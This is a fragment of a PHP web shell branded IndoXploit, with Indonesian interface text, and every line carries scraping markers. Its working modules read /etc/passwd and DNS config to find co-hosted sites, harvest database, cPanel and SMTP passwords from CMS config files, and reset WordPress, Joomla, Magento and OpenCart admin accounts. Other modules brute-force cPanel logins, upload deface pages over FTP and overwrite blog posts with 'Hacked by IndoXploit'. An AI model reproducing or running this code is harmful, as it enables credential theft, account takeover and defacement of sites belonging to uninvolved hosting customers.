- $dir_user = "/​hsphere/​local/​home/​$user";​ +
- if(is_dir($dir_user) === true) { +
- $url_user = $dir_user."/"​.$url;​ +
- if(is_readable($url_user)) { +
- $i++;​ +
- $jrw = "​[<​font color=lime>​R</​font>​] <a href='?​dir=$url_user'><​font color=gold>​$url_user</​font></​a>";​ +
- if(is_writable($url_user)) { +
- $jrw = "​[<​font color=lime>​RW</​font>​] <a href='?​dir=$url_user'><​font color=gold>​$url_user</​font></​a>";​ +
-+
- echo $jrw."<​br>";​ +
-+
-+
-+
-+
- if($i == 0) {  +
- } else { +
- echo "<​br>​Total ada "​.$i."​ Kamar di "​.$ip;​ +
-+
- echo "</​pre>";​ +
- } else { +
- echo '<​center>​ +
-   <form method="​post">​ +
-   List Domains: <​br>​ +
-   <​textarea name="​url"​ style="​width:​ 500px; height: 250px;">';​ +
- $fp = fopen("/​hsphere/​local/​config/​httpd/​sites/​sites.txt","​r"​);​ +
- while($getss = fgets($fp)) { +
- echo $getss; +
-+
- echo ​ '</​textarea><​br>​ +
-   <input type="​submit"​ value="​Jumping"​ name="​jump"​ style="​width:​ 500px; height: 25px;">​ +
-   </​form></​center>';​ +
-+
- } elseif(preg_match("/​vhosts|vhost/",​ $dir)) { +
- preg_match("/​\/​var\/​www\/​(.*?​)\//",​ $dir, $vh); +
- $urls = explode("​\r\n",​ $_POST['​url'​]);​ +
- if(isset($_POST['​jump'​])) { +
- echo "<​pre>";​ +
- foreach($urls as $url) { +
- $url = str_replace("​www.",​ "",​ $url); +
- $web_vh = "/​var/​www/"​.$vh[1]."/​$url/​httpdocs";​ +
- if(is_dir($web_vh) === true) { +
- if(is_readable($web_vh)) { +
- $i++;​ +
- $jrw = "​[<​font color=lime>​R</​font>​] <a href='?​dir=$web_vh'><​font color=gold>​$web_vh</​font></​a>";​ +
- if(is_writable($web_vh)) { +
- $jrw = "​[<​font color=lime>​RW</​font>​] <a href='?​dir=$web_vh'><​font color=gold>​$web_vh</​font></​a>";​ +
-+
- echo $jrw."<​br>";​ +
-+
-+
-+
- if($i == 0) {  +
- } else { +
- echo "<​br>​Total ada "​.$i."​ Kamar di "​.$ip;​ +
-+
- echo "</​pre>";​ +
- } else { +
- echo '<​center>​ +
-   <form method="​post">​ +
-   List Domains: <​br>​ +
-   <​textarea name="​url"​ style="​width:​ 500px; height: 250px;">';​ +
-   bing("​ip:​$ip"​);​ +
- echo ​ '</​textarea><​br>​ +
-   <input type="​submit"​ value="​Jumping"​ name="​jump"​ style="​width:​ 500px; height: 25px;">​ +
-   </​form></​center>';​ +
-+
- } else { +
- echo "<​pre>";​ +
- $etc = fopen("/​etc/​passwd",​ "​r"​) or die("<​font color=red>​Can'​t read /​etc/​passwd</​font>"​);​ +
- while($passwd = fgets($etc)) { +
- if($passwd == ''​ || !$etc) { +
- echo "<​font color=red>​Can'​t read /​etc/​passwd</​font>";​ +
- } else { +
- preg_match_all('/​(.*?​):​x:/',​ $passwd, $user_jumping);​ +
- foreach($user_jumping[1] as $user_idx_jump) { +
- $user_jumping_dir = "/​home/​$user_idx_jump/​public_html";​ +
- if(is_readable($user_jumping_dir)) { +
- $i++;​ +
- $jrw = "​[<​font color=lime>​R</​font>​] <a href='?​dir=$user_jumping_dir'><​font color=gold>​$user_jumping_dir</​font></​a>";​ +
- if(is_writable($user_jumping_dir)) { +
- $jrw = "​[<​font color=lime>​RW</​font>​] <a href='?​dir=$user_jumping_dir'><​font color=gold>​$user_jumping_dir</​font></​a>";​ +
-+
- echo $jrw; +
- if(function_exists('​posix_getpwuid'​)) { +
- $domain_jump = file_get_contents("/​etc/​named.conf"​);​  +
- if($domain_jump == ''​) { +
- echo " => ( <font color=red>​gabisa ambil nama domain nya</​font>​ )<​br>";​ +
- } else { +
- preg_match_all("#/​var/​named/​(.*?​).db#",​ $domain_jump,​ $domains_jump);​ +
- foreach($domains_jump[1] as $dj) { +
- $user_jumping_url = posix_getpwuid(@fileowner("/​etc/​valiases/​$dj"​));​ +
- $user_jumping_url = $user_jumping_url['​name'​];​ +
- if($user_jumping_url == $user_idx_jump) { +
- echo " => ( <​u>​$dj</​u>​ )<​br>";​ +
- break;​ +
-+
-+
-+
- } else { +
- echo "<​br>";​ +
-+
-+
-+
-+
-+
- if($i == 0) {  +
- } else { +
- echo "<​br>​Total ada "​.$i."​ Kamar di "​.$ip;​ +
-+
- echo "</​pre>";​ +
-+
- echo "</​div>";​ +
-} elseif($_GET['​do'​] == '​auto_edit_user'​) { +
- if($_POST['​hajar'​]) { +
- if(strlen($_POST['​pass_baru'​]) < 6 OR strlen($_POST['​user_baru'​]) < 6) { +
- echo "​username atau password harus lebih dari 6 karakter";​ +
- } else { +
- $user_baru = $_POST['​user_baru'​];​ +
- $pass_baru = md5($_POST['​pass_baru'​]);​ +
- $conf = $_POST['​config_dir'​];​ +
- $scan_conf = scandir($conf);​ +
- foreach($scan_conf as $file_conf) { +
- if(!is_file("​$conf/​$file_conf"​)) continue; +
- $config = file_get_contents("​$conf/​$file_conf"​);​ +
- if(preg_match("/​JConfig|joomla/",​$config)) { +
- $dbhost = ambilkata($config,"​host = '","'"​);​ +
- $dbuser = ambilkata($config,"​user = '","'"​);​ +
- $dbpass = ambilkata($config,"​password = '","'"​);​ +
- $dbname = ambilkata($config,"​db = '","'"​);​ +
- $dbprefix = ambilkata($config,"​dbprefix = '","'"​);​ +
- $prefix = $dbprefix."​users";​ +
- $conn = mysql_connect($dbhost,​$dbuser,​$dbpass);​ +
- $db = mysql_select_db($dbname);​ +
- $q = mysql_query("​SELECT * FROM $prefix ORDER BY id ASC"​);​ +
- $result = mysql_fetch_array($q);​ +
- $id = $result['​id'​];​ +
- $site = ambilkata($config,"​sitename = '","'"​);​ +
- $update = mysql_query("​UPDATE $prefix SET username='​$user_baru',​password='​$pass_baru'​ WHERE id='​$id'"​);​ +
- echo "​Config => "​.$file_conf."<​br>";​ +
- echo "CMS => Joomla<​br>";​ +
- if($site == ''​) { +
- echo "​Sitename => <font color=red>​error,​ gabisa ambil nama domain nya</​font><​br>";​ +
- } else { +
- echo "​Sitename => $site<​br>";​ +
-+
- if(!$update OR !$conn OR !$db) { +
- echo "​Status => <font color=red>"​.mysql_error()."</​font><​br><​br>";​ +
- } else { +
- echo "​Status => <font color=lime>​sukses edit user, silakan login dengan user & pass yang baru.</​font><​br><​br>";​ +
-+
- mysql_close($conn);​ +
- } elseif(preg_match("/​WordPress/",​$config)) { +
- $dbhost = ambilkata($config,"​DB_HOST',​ '","'"​);​ +
- $dbuser = ambilkata($config,"​DB_USER',​ '","'"​);​ +
- $dbpass = ambilkata($config,"​DB_PASSWORD',​ '","'"​);​ +
- $dbname = ambilkata($config,"​DB_NAME',​ '","'"​);​ +
- $dbprefix = ambilkata($config,"​table_prefix ​ = '","'"​);​ +
- $prefix = $dbprefix."​users";​ +
- $option = $dbprefix."​options";​ +
- $conn = mysql_connect($dbhost,​$dbuser,​$dbpass);​ +
- $db = mysql_select_db($dbname);​ +
- $q = mysql_query("​SELECT * FROM $prefix ORDER BY id ASC"​);​ +
- $result = mysql_fetch_array($q);​ +
- $id = $result[ID];​ +
- $q2 = mysql_query("​SELECT * FROM $option ORDER BY option_id ASC"​);​ +
- $result2 = mysql_fetch_array($q2);​ +
- $target = $result2[option_value];​ +
- if($target == ''​) { +
- $url_target = "Login => <font color=red>​error,​ gabisa ambil nama domain nyaa</​font><​br>";​ +
- } else { +
- $url_target = "Login => <a href='​$target/​wp-login.php'​ target='​_blank'><​u>​$target/​wp-login.php</​u></​a><​br>";​ +
-+
- $update = mysql_query("​UPDATE $prefix SET user_login='​$user_baru',​user_pass='​$pass_baru'​ WHERE id='​$id'"​);​ +
- echo "​Config => "​.$file_conf."<​br>";​ +
- echo "CMS => Wordpress<​br>";​ +
- echo $url_target;​ +
- if(!$update OR !$conn OR !$db) { +
- echo "​Status => <font color=red>"​.mysql_error()."</​font><​br><​br>";​ +
- } else { +
- echo "​Status => <font color=lime>​sukses edit user, silakan login dengan user & pass yang baru.</​font><​br><​br>";​ +
-+
- mysql_close($conn);​ +
- } elseif(preg_match("/​Magento|Mage_Core/",​$config)) { +
- $dbhost = ambilkata($config,"<​host><​![CDATA[","​]]></​host>"​);​ +
- $dbuser = ambilkata($config,"<​username><​![CDATA[","​]]></​username>"​);​ +
- $dbpass = ambilkata($config,"<​password><​![CDATA[","​]]></​password>"​);​ +
- $dbname = ambilkata($config,"<​dbname><​![CDATA[","​]]></​dbname>"​);​ +
- $dbprefix = ambilkata($config,"<​table_prefix><​![CDATA[","​]]></​table_prefix>"​);​ +
- $prefix = $dbprefix."​admin_user";​ +
- $option = $dbprefix."​core_config_data";​ +
- $conn = mysql_connect($dbhost,​$dbuser,​$dbpass);​ +
- $db = mysql_select_db($dbname);​ +
- $q = mysql_query("​SELECT * FROM $prefix ORDER BY user_id ASC"​);​ +
- $result = mysql_fetch_array($q);​ +
- $id = $result[user_id];​ +
- $q2 = mysql_query("​SELECT * FROM $option WHERE path='​web/​secure/​base_url'"​);​ +
- $result2 = mysql_fetch_array($q2);​ +
- $target = $result2[value];​ +
- if($target == ''​) { +
- $url_target = "Login => <font color=red>​error,​ gabisa ambil nama domain nyaa</​font><​br>";​ +
- } else { +
- $url_target = "Login => <a href='​$target/​admin/'​ target='​_blank'><​u>​$target/​admin/</​u></​a><​br>";​ +
-+
- $update = mysql_query("​UPDATE $prefix SET username='​$user_baru',​password='​$pass_baru'​ WHERE user_id='​$id'"​);​ +
- echo "​Config => "​.$file_conf."<​br>";​ +
- echo "CMS => Magento<​br>";​ +
- echo $url_target;​ +
- if(!$update OR !$conn OR !$db) { +
- echo "​Status => <font color=red>"​.mysql_error()."</​font><​br><​br>";​ +
- } else { +
- echo "​Status => <font color=lime>​sukses edit user, silakan login dengan user & pass yang baru.</​font><​br><​br>";​ +
-+
- mysql_close($conn);​ +
- } elseif(preg_match("/​HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",​$config)) { +
- $dbhost = ambilkata($config,"'​DB_HOSTNAME',​ '","'"​);​ +
- $dbuser = ambilkata($config,"'​DB_USERNAME',​ '","'"​);​ +
- $dbpass = ambilkata($config,"'​DB_PASSWORD',​ '","'"​);​ +
- $dbname = ambilkata($config,"'​DB_DATABASE',​ '","'"​);​ +
- $dbprefix = ambilkata($config,"'​DB_PREFIX',​ '","'"​);​ +
- $prefix = $dbprefix."​user";​ +
- $conn = mysql_connect($dbhost,​$dbuser,​$dbpass);​ +
- $db = mysql_select_db($dbname);​ +
- $q = mysql_query("​SELECT * FROM $prefix ORDER BY user_id ASC"​);​ +
- $result = mysql_fetch_array($q);​ +
- $id = $result[user_id];​ +
- $target = ambilkata($config,"​HTTP_SERVER',​ '","'"​);​ +
- if($target == ''​) { +
- $url_target = "Login => <font color=red>​error,​ gabisa ambil nama domain nyaa</​font><​br>";​ +
- } else { +
- $url_target = "Login => <a href='​$target'​ target='​_blank'><​u>​$target</​u></​a><​br>";​ +
-+
- $update = mysql_query("​UPDATE $prefix SET username='​$user_baru',​password='​$pass_baru'​ WHERE user_id='​$id'"​);​ +
- echo "​Config => "​.$file_conf."<​br>";​ +
- echo "CMS => OpenCart<​br>";​ +
- echo $url_target;​ +
- if(!$update OR !$conn OR !$db) { +
- echo "​Status => <font color=red>"​.mysql_error()."</​font><​br><​br>";​ +
- } else { +
- echo "​Status => <font color=lime>​sukses edit user, silakan login dengan user & pass yang baru.</​font><​br><​br>";​ +
-+
- mysql_close($conn);​ +
- } elseif(preg_match("/​panggil fungsi validasi xss dan injection/",​$config)) { +
- $dbhost = ambilkata($config,'​server = "','"'​);​ +
- $dbuser = ambilkata($config,'​username = "','"'​);​ +
- $dbpass = ambilkata($config,'​password = "','"'​);​ +
- $dbname = ambilkata($config,'​database = "','"'​);​ +
- $prefix = "​users";​ +
- $option = "​identitas";​ +
- $conn = mysql_connect($dbhost,​$dbuser,​$dbpass);​ +
- $db = mysql_select_db($dbname);​ +
- $q = mysql_query("​SELECT * FROM $option ORDER BY id_identitas ASC"​);​ +
- $result = mysql_fetch_array($q);​ +
- $target = $result[alamat_website];​ +
- if($target == ''​) { +
- $target2 = $result[url];​ +
- $url_target = "Login => <font color=red>​error,​ gabisa ambil nama domain nyaa</​font><​br>";​ +
- if($target2 == ''​) { +
- $url_target2 = "Login => <font color=red>​error,​ gabisa ambil nama domain nyaa</​font><​br>";​ +
- } else { +
- $cek_login3 = file_get_contents("​$target2/​adminweb/"​);​ +
- $cek_login4 = file_get_contents("​$target2/​lokomedia/​adminweb/"​);​ +
- if(preg_match("/​CMS Lokomedia|Administrator/",​ $cek_login3)) { +
- $url_target2 = "Login => <a href='​$target2/​adminweb'​ target='​_blank'><​u>​$target2/​adminweb</​u></​a><​br>";​ +
- } elseif(preg_match("/​CMS Lokomedia|Lokomedia/",​ $cek_login4)) { +
- $url_target2 = "Login => <a href='​$target2/​lokomedia/​adminweb'​ target='​_blank'><​u>​$target2/​lokomedia/​adminweb</​u></​a><​br>";​ +
- } else { +
- $url_target2 = "Login => <a href='​$target2'​ target='​_blank'><​u>​$target2</​u></​a>​ [ <font color=red>​gatau admin login nya dimana :​p</​font>​ ]<​br>";​ +
-+
-+
- } else { +
- $cek_login = file_get_contents("​$target/​adminweb/"​);​ +
- $cek_login2 = file_get_contents("​$target/​lokomedia/​adminweb/"​);​ +
- if(preg_match("/​CMS Lokomedia|Administrator/",​ $cek_login)) { +
- $url_target = "Login => <a href='​$target/​adminweb'​ target='​_blank'><​u>​$target/​adminweb</​u></​a><​br>";​ +
- } elseif(preg_match("/​CMS Lokomedia|Lokomedia/",​ $cek_login2)) { +
- $url_target = "Login => <a href='​$target/​lokomedia/​adminweb'​ target='​_blank'><​u>​$target/​lokomedia/​adminweb</​u></​a><​br>";​ +
- } else { +
- $url_target = "Login => <a href='​$target'​ target='​_blank'><​u>​$target</​u></​a>​ [ <font color=red>​gatau admin login nya dimana :​p</​font>​ ]<​br>";​ +
-+
-+
- $update = mysql_query("​UPDATE $prefix SET username='​$user_baru',​password='​$pass_baru'​ WHERE level='​admin'"​);​ +
- echo "​Config => "​.$file_conf."<​br>";​ +
- echo "CMS => Lokomedia<​br>";​ +
- if(preg_match('/​error,​ gabisa ambil nama domain nya/', $url_target)) { +
- echo $url_target2;​ +
- } else { +
- echo $url_target;​ +
-+
- if(!$update OR !$conn OR !$db) { +
- echo "​Status => <font color=red>"​.mysql_error()."</​font><​br><​br>";​ +
- } else { +
- echo "​Status => <font color=lime>​sukses edit user, silakan login dengan user & pass yang baru.</​font><​br><​br>";​ +
-+
- mysql_close($conn);​ +
-+
-+
-+
- } else { +
- echo "<​center>​ +
- <​h1>​Auto Edit User Config</​h1>​ +
- <form method='​post'>​ +
- DIR Config: <​br>​ +
- <input type='​text'​ size='​50'​ name='​config_dir'​ value='​$dir'><​br><​br>​ +
- Set User & Pass: <​br>​ +
- <input type='​text'​ name='​user_baru'​ value='​indoxploit'​ placeholder='​user_baru'><​br>​ +
- <input type='​text'​ name='​pass_baru'​ value='​indoxploit'​ placeholder='​pass_baru'><​br>​ +
- <input type='​submit'​ name='​hajar'​ value='​Hajar!'​ style='​width:​ 215px;'>​ +
- </​form>​ +
- <​span>​NB:​ Tools ini work jika dijalankan di dalam folder <​u>​config</​u>​ ( ex: /​home/​user/​public_html/​nama_folder_config )</​span><​br>​ +
- "; +
-+
-} elseif($_GET['​do'​] == '​cpanel'​) { +
- if($_POST['​crack'​]) { +
- $usercp = explode("​\r\n",​ $_POST['​user_cp'​]);​ +
- $passcp = explode("​\r\n",​ $_POST['​pass_cp'​]);​ +
- $i = 0; +
- foreach($usercp as $ucp) { +
- foreach($passcp as $pcp) { +
- if(@mysql_connect('​localhost',​ $ucp, $pcp)) { +
- if($_SESSION[$ucp] && $_SESSION[$pcp]) { +
- } else { +
- $_SESSION[$ucp] = "​1";​ +
- $_SESSION[$pcp] = "​1";​ +
- if($ucp == ''​ || $pcp == ''​) { +
-  +
- } else { +
- $i++;​ +
- if(function_exists('​posix_getpwuid'​)) { +
- $domain_cp = file_get_contents("/​etc/​named.conf"​);​  +
- if($domain_cp == ''​) { +
- $dom =  "<​font color=red>​gabisa ambil nama domain nya</​font>";​ +
- } else { +
- preg_match_all("#/​var/​named/​(.*?​).db#",​ $domain_cp, $domains_cp);​ +
- foreach($domains_cp[1] as $dj) { +
- $user_cp_url = posix_getpwuid(@fileowner("/​etc/​valiases/​$dj"​));​ +
- $user_cp_url = $user_cp_url['​name'​];​ +
- if($user_cp_url == $ucp) { +
- $dom = "<a href='​http://​$dj/'​ target='​_blank'><​font color=lime>​$dj</​font></​a>";​ +
- break;​ +
-+
-+
-+
- } else { +
- $dom = "<​font color=red>​function is Disable by system</​font>";​ +
-+
- echo "​username (<font color=lime>​$ucp</​font>​) password (<font color=lime>​$pcp</​font>​) domain ($dom)<​br>";​ +
-+
-+
-+
-+
-+
- if($i == 0) { +
- } else { +
- echo "<​br>​sukses nyolong "​.$i."​ Cpanel by <font color=lime>​IndoXploit.</​font>";​ +
-+
- } else { +
- echo "<​center>​ +
- <form method='​post'>​ +
- USER: <​br>​ +
- <​textarea style='​width:​ 450px; height: 150px;'​ name='​user_cp'>";​ +
- $_usercp = fopen("/​etc/​passwd","​r"​);​ +
- while($getu = fgets($_usercp)) { +
- if($getu == ''​ || !$_usercp) { +
- echo "<​font color=red>​Can'​t read /​etc/​passwd</​font>";​ +
- } else { +
- preg_match_all("/​(.*?​):​x:/",​ $getu, $u); +
- foreach($u[1] as $user_cp) { +
- if(is_dir("/​home/​$user_cp/​public_html"​)) { +
- echo "​$user_cp\n";​ +
-+
-+
-+
-+
- echo "</​textarea><​br>​ +
- PASS: <​br>​ +
- <​textarea style='​width:​ 450px; height: 200px;'​ name='​pass_cp'>";​ +
- function cp_pass($dir) { +
- $pass = "";​ +
- $dira = scandir($dir);​ +
- foreach($dira as $dirb) { +
- if(!is_file("​$dir/​$dirb"​)) continue; +
- $ambil = file_get_contents("​$dir/​$dirb"​);​ +
- if(preg_match("/​WordPress/",​ $ambil)) { +
- $pass .= ambilkata($ambil,"​DB_PASSWORD',​ '","'"​)."​\n";​ +
- } elseif(preg_match("/​JConfig|joomla/",​ $ambil)) { +
- $pass .= ambilkata($ambil,"​password = '","'"​)."​\n";​ +
- } elseif(preg_match("/​Magento|Mage_Core/",​ $ambil)) { +
- $pass .= ambilkata($ambil,"<​password><​![CDATA[","​]]></​password>"​)."​\n";​ +
- } elseif(preg_match("/​panggil fungsi validasi xss dan injection/",​ $ambil)) { +
- $pass .= ambilkata($ambil,'​password = "','"'​)."​\n";​ +
- } elseif(preg_match("/​HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",​ $ambil)) { +
- $pass .= ambilkata($ambil,"'​DB_PASSWORD',​ '","'"​)."​\n";​ +
- } elseif(preg_match("/​^[client]$/",​ $ambil)) { +
- preg_match("/​password=(.*?​)/",​ $ambil, $pass1); +
- if(preg_match('/"/',​ $pass1[1])) { +
- $pass1[1] = str_replace('"',​ "",​ $pass1[1]);​ +
- $pass .= $pass1[1]."​\n";​ +
- } else { +
- $pass .= $pass1[1]."​\n";​ +
-+
- } elseif(preg_match("/​cc_encryption_hash/",​ $ambil)) { +
- $pass .= ambilkata($ambil,"​db_password = '","'"​)."​\n";​ +
-+
-+
- echo $pass; +
-+
- $cp_pass = cp_pass($dir);​ +
- echo $cp_pass; +
- echo "</​textarea><​br>​ +
- <input type='​submit'​ name='​crack'​ style='​width:​ 450px;'​ value='​Crack'>​ +
- </​form>​ +
- <​span>​NB:​ CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <​u>​config</​u>​ ( ex: /​home/​user/​public_html/​nama_folder_config )</​span><​br></​center>";​ +
-+
-} elseif($_GET['​do'​] == '​cpftp_auto'​) { +
- if($_POST['​crack'​]) { +
- $usercp = explode("​\r\n",​ $_POST['​user_cp'​]);​ +
- $passcp = explode("​\r\n",​ $_POST['​pass_cp'​]);​ +
- $i = 0; +
- foreach($usercp as $ucp) { +
- foreach($passcp as $pcp) { +
- if(@mysql_connect('​localhost',​ $ucp, $pcp)) { +
- if($_SESSION[$ucp] && $_SESSION[$pcp]) { +
- } else { +
- $_SESSION[$ucp] = "​1";​ +
- $_SESSION[$pcp] = "​1";​ +
- if($ucp == ''​ || $pcp == ''​) { +
- // +
- } else { +
- echo "[+] username (<font color=lime>​$ucp</​font>​) password (<font color=lime>​$pcp</​font>​)<​br>";​ +
- $ftp_conn = ftp_connect($ip);​ +
- $ftp_login = ftp_login($ftp_conn,​ $ucp, $pcp); +
- if((!$ftp_login) || (!$ftp_conn)) { +
- echo "[+] <font color=red>​Login Gagal</​font><​br><​br>";​ +
- } else { +
- echo "[+] <font color=lime>​Login Sukses</​font><​br>";​ +
- $fi = htmlspecialchars($_POST['​file_deface'​]);​ +
- $deface = ftp_put($ftp_conn,​ "​public_html/​$fi",​ $_POST['​deface'​],​ FTP_BINARY);​ +
- if($deface) { +
- $i++;​ +
- echo "[+] <font color=lime>​Deface Sukses</​font><​br>";​ +
- if(function_exists('​posix_getpwuid'​)) { +
- $domain_cp = file_get_contents("/​etc/​named.conf"​);​  +
- if($domain_cp == ''​) { +
- echo "[+] <font color=red>​gabisa ambil nama domain nya</​font><​br><​br>";​ +
- } else { +
- preg_match_all("#/​var/​named/​(.*?​).db#",​ $domain_cp, $domains_cp);​ +
- foreach($domains_cp[1] as $dj) { +
- $user_cp_url = posix_getpwuid(@fileowner("/​etc/​valiases/​$dj"​));​ +
- $user_cp_url = $user_cp_url['​name'​];​ +
- if($user_cp_url == $ucp) { +
- echo "[+] <a href='​http://​$dj/​$fi'​ target='​_blank'>​http://​$dj/​$fi</​a><​br><​br>";​ +
- break;​ +
-+
-+
-+
- } else { +
- echo "[+] <font color=red>​gabisa ambil nama domain nya</​font><​br><​br>";​ +
-+
- } else { +
- echo "[-] <font color=red>​Deface Gagal</​font><​br><​br>";​ +
-+
-+
- //​echo "​username (<font color=lime>​$ucp</​font>​) password (<font color=lime>​$pcp</​font>​)<​br>";​ +
-+
-+
-+
-+
-+
- if($i == 0) { +
- } else { +
- echo "<​br>​sukses deface "​.$i."​ Cpanel by <font color=lime>​IndoXploit.</​font>";​ +
-+
- } else { +
- echo "<​center>​ +
- <form method='​post'>​ +
- Filename: <​br>​ +
- <input type='​text'​ name='​file_deface'​ placeholder='​index.php'​ value='​index.php'​ style='​width:​ 450px;'><​br>​ +
- Deface Page: <​br>​ +
- <input type='​text'​ name='​deface'​ placeholder='​http://​www.web-yang-udah-di-deface.com/​filemu.php'​ style='​width:​ 450px;'><​br>​ +
- USER: <​br>​ +
- <​textarea style='​width:​ 450px; height: 150px;'​ name='​user_cp'>";​ +
- $_usercp = fopen("/​etc/​passwd","​r"​);​ +
- while($getu = fgets($_usercp)) { +
- if($getu == ''​ || !$_usercp) { +
- echo "<​font color=red>​Can'​t read /​etc/​passwd</​font>";​ +
- } else { +
- preg_match_all("/​(.*?​):​x:/",​ $getu, $u); +
- foreach($u[1] as $user_cp) { +
- if(is_dir("/​home/​$user_cp/​public_html"​)) { +
- echo "​$user_cp\n";​ +
-+
-+
-+
-+
- echo "</​textarea><​br>​ +
- PASS: <​br>​ +
- <​textarea style='​width:​ 450px; height: 200px;'​ name='​pass_cp'>";​ +
- function cp_pass($dir) { +
- $pass = "";​ +
- $dira = scandir($dir);​ +
- foreach($dira as $dirb) { +
- if(!is_file("​$dir/​$dirb"​)) continue; +
- $ambil = file_get_contents("​$dir/​$dirb"​);​ +
- if(preg_match("/​WordPress/",​ $ambil)) { +
- $pass .= ambilkata($ambil,"​DB_PASSWORD',​ '","'"​)."​\n";​ +
- } elseif(preg_match("/​JConfig|joomla/",​ $ambil)) { +
- $pass .= ambilkata($ambil,"​password = '","'"​)."​\n";​ +
- } elseif(preg_match("/​Magento|Mage_Core/",​ $ambil)) { +
- $pass .= ambilkata($ambil,"<​password><​![CDATA[","​]]></​password>"​)."​\n";​ +
- } elseif(preg_match("/​panggil fungsi validasi xss dan injection/",​ $ambil)) { +
- $pass .= ambilkata($ambil,'​password = "','"'​)."​\n";​ +
- } elseif(preg_match("/​HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",​ $ambil)) { +
- $pass .= ambilkata($ambil,"'​DB_PASSWORD',​ '","'"​)."​\n";​ +
- } elseif(preg_match("/​client/",​ $ambil)) { +
- preg_match("/​password=(.*)/",​ $ambil, $pass1); +
- if(preg_match('/"/',​ $pass1[1])) { +
- $pass1[1] = str_replace('"',​ "",​ $pass1[1]);​ +
- $pass .= $pass1[1]."​\n";​ +
-+
- } elseif(preg_match("/​cc_encryption_hash/",​ $ambil)) { +
- $pass .= ambilkata($ambil,"​db_password = '","'"​)."​\n";​ +
-+
-+
- echo $pass; +
-+
- $cp_pass = cp_pass($dir);​ +
- echo $cp_pass; +
- echo "</​textarea><​br>​ +
- <input type='​submit'​ name='​crack'​ style='​width:​ 450px;'​ value='​Hajar'>​ +
- </​form>​ +
- <​span>​NB:​ CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <​u>​config</​u>​ ( ex: /​home/​user/​public_html/​nama_folder_config )</​span><​br></​center>";​ +
-+
-} elseif($_GET['​do'​] == '​smtp'​) { +
- echo "<​center><​span>​NB:​ Tools ini work jika dijalankan di dalam folder <​u>​config</​u>​ ( ex: /​home/​user/​public_html/​nama_folder_config )</​span></​center><​br>";​ +
- function scj($dir) { +
- $dira = scandir($dir);​ +
- foreach($dira as $dirb) { +
- if(!is_file("​$dir/​$dirb"​)) continue; +
- $ambil = file_get_contents("​$dir/​$dirb"​);​ +
- $ambil = str_replace("​$",​ "",​ $ambil); +
- if(preg_match("/​JConfig|joomla/",​ $ambil)) { +
- $smtp_host = ambilkata($ambil,"​smtphost = '","'"​);​ +
- $smtp_auth = ambilkata($ambil,"​smtpauth = '","'"​);​ +
- $smtp_user = ambilkata($ambil,"​smtpuser = '","'"​);​ +
- $smtp_pass = ambilkata($ambil,"​smtppass = '","'"​);​ +
- $smtp_port = ambilkata($ambil,"​smtpport = '","'"​);​ +
- $smtp_secure = ambilkata($ambil,"​smtpsecure = '","'"​);​ +
- echo "SMTP Host: <font color=lime>​$smtp_host</​font><​br>";​ +
- echo "SMTP port: <font color=lime>​$smtp_port</​font><​br>";​ +
- echo "SMTP user: <font color=lime>​$smtp_user</​font><​br>";​ +
- echo "SMTP pass: <font color=lime>​$smtp_pass</​font><​br>";​ +
- echo "SMTP auth: <font color=lime>​$smtp_auth</​font><​br>";​ +
- echo "SMTP secure: <font color=lime>​$smtp_secure</​font><​br><​br>";​ +
-+
-+
-+
- $smpt_hunter = scj($dir);​ +
- echo $smpt_hunter;​ +
-} elseif($_GET['​do'​] == '​auto_wp'​) { +
- if($_POST['​hajar'​]) { +
- $title = htmlspecialchars($_POST['​new_title'​]);​ +
- $pn_title = str_replace("​ ", "​-",​ $title); +
- if($_POST['​cek_edit'​] == "​Y"​) { +
- $script = $_POST['​edit_content'​];​ +
- } else { +
- $script = $title; +
-+
- $conf = $_POST['​config_dir'​];​ +
- $scan_conf = scandir($conf);​ +
- foreach($scan_conf as $file_conf) { +
- if(!is_file("​$conf/​$file_conf"​)) continue; +
- $config = file_get_contents("​$conf/​$file_conf"​);​ +
- if(preg_match("/​WordPress/",​ $config)) { +
- $dbhost = ambilkata($config,"​DB_HOST',​ '","'"​);​ +
- $dbuser = ambilkata($config,"​DB_USER',​ '","'"​);​ +
- $dbpass = ambilkata($config,"​DB_PASSWORD',​ '","'"​);​ +
- $dbname = ambilkata($config,"​DB_NAME',​ '","'"​);​ +
- $dbprefix = ambilkata($config,"​table_prefix ​ = '","'"​);​ +
- $prefix = $dbprefix."​posts";​ +
- $option = $dbprefix."​options";​ +
- $conn = mysql_connect($dbhost,​$dbuser,​$dbpass);​ +
- $db = mysql_select_db($dbname);​ +
- $q = mysql_query("​SELECT * FROM $prefix ORDER BY ID ASC"​);​ +
- $result = mysql_fetch_array($q);​ +
- $id = $result[ID];​ +
- $q2 = mysql_query("​SELECT * FROM $option ORDER BY option_id ASC"​);​ +
- $result2 = mysql_fetch_array($q2);​ +
- $target = $result2[option_value];​ +
- $update = mysql_query("​UPDATE $prefix SET post_title='​$title',​post_content='​$script',​post_name='​$pn_title',​post_status='​publish',​comment_status='​open',​ping_status='​open',​post_type='​post',​comment_count='​1'​ WHERE id='​$id'"​);​ +
- $update .= mysql_query("​UPDATE $option SET option_value='​$title'​ WHERE option_name='​blogname'​ OR option_name='​blogdescription'"​);​ +
- echo "<​div style='​margin:​ 5px auto;'>";​ +
- if($target == ''​) { +
- echo "URL: <font color=red>​error,​ gabisa ambil nama domain nya</​font>​ -> "; +
- } else { +
- echo "URL: <a href='​$target/?​p=$id'​ target='​_blank'>​$target/?​p=$id</​a>​ -> "; +
-+
- if(!$update OR !$conn OR !$db) { +
- echo "<​font color=red>​MySQL Error: "​.mysql_error()."</​font><​br>";​ +
- } else { +
- echo "<​font color=lime>​sukses di ganti.</​font><​br>";​ +
-+
- echo "</​div>";​ +
- mysql_close($conn);​ +
-+
-+
- } else { +
- echo "<​center>​ +
- <​h1>​Auto Edit Title+Content WordPress</​h1>​ +
- <form method='​post'>​ +
- DIR Config: <​br>​ +
- <input type='​text'​ size='​50'​ name='​config_dir'​ value='​$dir'><​br><​br>​ +
- Set Title: <​br>​ +
- <input type='​text'​ name='​new_title'​ value='​Hacked by IndoXploit'​ placeholder='​New Title'><​br><​br>​ +
